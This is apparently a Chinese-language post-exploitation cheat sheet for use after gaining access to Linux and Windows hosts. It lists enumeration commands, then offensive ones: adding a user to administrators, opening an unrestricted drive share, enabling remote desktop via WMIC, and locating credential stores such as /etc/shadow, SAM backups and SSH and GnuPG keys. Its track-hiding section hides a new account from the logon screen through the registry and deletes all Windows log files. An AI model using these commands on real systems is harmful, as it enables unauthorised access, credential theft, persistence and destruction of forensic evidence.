拿到权限后 快速收集信息
Lliunx
基本信息收集 • Linux • /etc/resolv.conf DNS的篡改啊 劫持之类的 • /etc/passwd 但是很早liunx就不存在里面了 • /etc/shadow 密码在这里 • whoami and who –a • ifconfig -a, iptables -L -n, ifconfig –a, (netstat –rn 查看当前系统的网关和路由设置) • uname –a, ps aux • dpkg -l| head 列出当前操作系统的所有安装的软件包
Windows
• Windows • ipconfig /all , ipconfig /displadns, netstat -bnao , netstat –r • net view , net view /domain • net user /domain(域账号的信息), net user %username% /domain • net accounts, net share • net localgroup administrators username /add (把username加入administrators组里面) • net group "Domain Controllers" /domain (查询"Domain Controllers"里面的主机) • net share name$=C:\ /unlimited 开一个共享
dns服务器缓存 上面
发现一被锁定的域账号 启动他
WMIC
• wmic nicconfig get ipaddress,macaddress • wmic computersystem get username 查看当前登录用户 • wmic netlogin get name,lastlogon 查看用户登陆记录 • wmic process get caption, executablepath,commandline 查看进程 轻松使用 还有点好用 • wmic process where name=“calc.exe" call terminate 结束一些进程 • wmic os get name,servicepackmajorversion • wmic product get name,version • wmic product where name=“name” call uninstall /nointeractive 删掉软件
• wmic share get /ALL • wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“ 开启远程桌面的 • wmic nteventlog get path,filename, writeable 查看当前系统的日志
收集
收集敏感数据 • 商业信息 • 系统信息 • Linux • /etc ;/usr/local/etc • /etc/password ;/etc/shadow • .ssh ;.gnupg 公私钥 • The e-mail and data files • 业务数据库 ;身份认证服务器数据库 • /tmp 收集敏感数据 • windows • SAM 数据库 ; 注册表文件 • %SYSTEMROOT%\repair\SAM • %SYSTEMROOT%\System32\config\RegBack\SAM • 业务数据库 ; 身份认证数据库 • 临时文件目录 • UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\ 隐藏痕迹 • 禁止在登陆界面显示新建账号 • REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0 • del %WINDIR%\*.log /a/s/q/f • History • 日志 • auth.log / secure • btmp / wtmp • lastlog / faillog • 其他日志和 HIDS 等
